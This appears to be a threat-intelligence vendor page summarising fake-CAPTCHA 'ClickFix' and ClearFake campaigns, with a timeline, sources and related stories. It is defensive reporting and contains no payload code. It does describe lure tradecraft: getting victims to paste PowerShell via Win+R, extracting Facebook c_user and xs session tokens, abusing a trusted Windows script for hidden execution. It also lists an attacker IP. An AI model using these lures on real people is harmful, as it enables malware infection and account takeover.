Fake CAPTCHA/ClickFix Social Engineering Used to Deliver Malware and Steal Sessions
Threat actors are increasingly using fake CAPTCHA / verification pages as a scalable social-engineering lure to deliver malware and steal credentials by abusing users’ trust in routine web security checks. Research highlighted a large, fragmented ecosystem of lookalike fake CAPTCHA pages hosted across ~9,494 compromised sites and malicious properties, where roughly 70% of observed pages share near-identical visuals while delivering dozens of distinct payload variants via different execution models, including clipboard-driven instructions that lead victims to run PowerShell or VBScript downloaders.
Separately, a ClickFix campaign targeting Facebook users—especially content creators and businesses seeking verification—uses fake “verification” portals to trick victims into manually extracting and submitting browser session tokens (notably c_user and xs) via developer tools, enabling account takeover without exploiting software vulnerabilities. In parallel, the ClearFake campaign (a malicious JavaScript framework injected into hacked websites) has adopted ClickFix-style fake CAPTCHA lures and added more evasive “living off the land” behavior, including proxy execution to run PowerShell through trusted Windows features and shifting distribution to a popular CDN, reducing the effectiveness of defenses that rely primarily on blocking known-bad domains/IPs.
Get ahead of threats like this
Mallory correlates global threat intelligence with your attack surface — know if you’re exposed before adversaries strike.
How this story unfolded
6 events from the most recent confirmed update back to the earliest known activity.
Censys identifies large fake CAPTCHA ecosystem across 9,494 sites
Censys analysts reported a broad fake verification ecosystem spanning about 9,494 compromised websites and malicious properties, with roughly 70% sharing nearly identical fake CAPTCHA pages. They identified at least 32 payload variants, including clipboard-driven PowerShell or VBScript execution, MSI delivery via msiexec, and fileless push-notification abuse through Matrix Push C2.
Cyber Security News reports ClickFix Facebook hijacking campaign
Cyber Security News reported on the widespread ClickFix campaign stealing Facebook accounts through fake verification pages and manual session-token theft. The coverage highlighted urgency tactics, instructional videos, and the instruction for victims not to log out for 24 hours so stolen cookies remain valid.
Expel documents ClearFake's updated fake-CAPTCHA delivery chain
Expel published technical details on ClearFake's large-scale campaign, describing compromised websites that inject fake CAPTCHA prompts and use ClickFix-style clipboard lures to make users run malware. The report also noted anti-analysis checks, smart-contract-based payload retrieval, and a UUID tracking mechanism to avoid reinfection and record infections.
ClearFake adopts more evasive LOTL proxy execution techniques
The ClearFake fake-CAPTCHA malware campaign recently shifted to a more evasive execution chain that abuses SyncAppvPublishingServer.vbs to launch hidden PowerShell through command injection. It also moved payload hosting to the legitimate jsDelivr CDN while continuing to retrieve JavaScript stages from BNB Smart Chain testnet smart contracts.
ClickFix campaign expands with resilient token-theft infrastructure
From early 2025, the Facebook-focused ClickFix operation grew significantly and adopted distributed hosting and collection services such as Netlify, Vercel, Wasmer, GitHub Pages, Surge, Formspark, and submit-form.com. The workflow validated stolen c_user and xs tokens in real time and escalated to collecting recovery codes or passwords when token reuse failed.
ClickFix Facebook session hijacking campaign begins
A social-engineering campaign later dubbed ClickFix began operating in January 2025, targeting Facebook content creators, monetized pages, and businesses. The attackers used fake Facebook verification and account-review pages to trick victims into extracting and submitting their own session cookies.
Related entities
Vulnerabilities, threat actors, malware, products, organizations, and breaches Mallory has linked to this story.
Sources
3 references tracked. Mallory keeps watching after this page renders.
Fake Captcha Ecosystem Exploits Trusted Web Infrastructure to Deliver Malware
cybersecuritynews.com
Open sourceNew ClickFix Campaign Hijacks Facebook Sessions Using Fake Verification Pages
cybersecuritynews.com
Open sourceClearFake gets more evasive with new living off the land (LOTL) techniques | Expel
expel.com
Open sourceSee the full picture, correlated to your attack surface.
Map indicators from this story to your assets and identify affected systems in minutes.
Every observed campaign, victim, and pivot linked to actors named in this story.
Malware, exploits, and IOCs connected to the activity described here.
YARA, Sigma, and Snort rules deployed to your SIEM as soon as they’re published.
Get matching new stories delivered to your team as they break — not the next morning.
Ask questions about this story and take action on the answers.
Related stories
Other stories Mallory is tracking that overlap on entities, sources, or topic labels.
Fake CAPTCHA (ClickFix) Social Engineering Used for Fileless Malware Delivery
Security researchers reported an active malware distribution technique that abuses **bogus CAPTCHA** pages to trick users into executing attacker-supplied commands on Windows. In the **ClearFake** campaign analyzed by Expel, victims land on a compromised site and are instructed to press `Win + R`, then paste and run a clipboard-seeded command—an approach commonly referred to as **ClickFix**—which results in malicious **PowerShell** execution. The campaign emphasizes *living-off-the-land* tradecraft and evasion, including **proxy execution** by abusing the trusted Windows script `C:\Windows\System32\SyncAppvPublishingServer.vbs` to launch PowerShell in hidden mode and reduce the chance of AV detection. Separate measurement and telemetry on the same broader tactic found large-scale infrastructure supporting fake CAPTCHA lures: a Censys analysis identified **9,494** breached websites hosting counterfeit verification pages, with ~**70%** appearing nearly identical. The most common infection mechanisms involved **clipboard manipulation** leading to **VBScript** and **PowerShell** execution (with significant counts of each observed), alongside other delivery paths such as `MSIEXEC`-based installation of malicious Windows Installer packages. Researchers also observed use of the **Matrix** push command-and-control framework to support **fileless** deployment, noting that these intrusions can leave no traditional executable artifacts and may evade signature-based detection.
Mar 21, 2026
Fake CAPTCHA and ClickFix Social Engineering Used to Deliver Stealer Malware
A wave of **social-engineering-driven malware delivery** is abusing “verification” and “fix” workflows to trick users into running attacker-supplied commands that install information stealers. LevelBlue reported a campaign using **fake Cloudflare-style CAPTCHA pages** on compromised websites to convince Windows users to manually execute malicious **PowerShell** commands, resulting in **StealC** deployment; StealC is described as exfiltrating browser credentials, crypto wallet data, Steam and Outlook credentials, system information, and screenshots over **RC4-encrypted HTTP** to a C2 server. Intego also identified an evolved **ClickFix** technique on macOS (“**Matryoshka**”) that leverages **typosquatting** to redirect users to pages instructing them to paste “fix” commands into Terminal; the loader then retrieves an AppleScript payload to steal browser credentials and target wallet apps (e.g., *Trezor Suite*, *Ledger Live*), including repeated fake password prompts as a fallback. Separately, other credential-theft campaigns are also leaning heavily on lures that exploit user trust and routine workflows. Morphisec described **Noodlophile** evolving from fake AI video platform ads to **fake job postings** and phishing “assessments,” delivering multi-stage stealers/RATs via techniques including **DLL sideloading**, while continuing to use **Telegram bots** for exfiltration/C2 and adding file-bloating content intended to disrupt automated analysis. These developments reinforce that user-in-the-loop execution (copy/paste commands, “verification” steps, and recruitment-themed forms) remains a high-yield initial access vector for stealers across both Windows and macOS environments.
Mar 21, 2026
ClickFix Social-Engineering Technique Using Fake CAPTCHA to Trigger Manual Command Execution
A **ClickFix**-style malware campaign has been observed using **fake CAPTCHA** pages on compromised websites to trick users into **manually executing** malicious commands, enabling initial access while evading controls that focus on downloaded files. In the reported activity, victims are prompted to copy a **PowerShell** command and run it themselves; the script then downloads additional stages from attacker infrastructure (including `91.92.240.219`), verifies user interaction by checking clipboard activity, and proceeds through a multi-stage infection chain. The payload is an **information stealer** targeting data from **25+ web browsers**, cryptocurrency wallets (e.g., *MetaMask*), and enterprise VPN configurations, with checks for virtualized environments and security tooling prior to exfiltration. Separately reported threat activity in the same time window includes **UnsolicitedBooker** targeting Central Asian telecoms with phishing-delivered backdoors (**LuciDoor** and **MarsSnake**) and **APT28** running *Operation MacroMaze*, which uses weaponized Office documents and `INCLUDEPICTURE` fields pointing to `webhook[.]site` URLs as a tracking mechanism and to support follow-on macro-based payload delivery. A video-style weekly briefing also mentions an evolution of ClickFix where an initial command uses `nslookup` and parses the response for execution, but it is a multi-topic roundup rather than a primary source on the fake-CAPTCHA infostealer campaign; a malware newsletter roundup is likewise a link collection and does not add specific, corroborating details about the ClickFix CAPTCHA infostealer operation.
May 26, 2026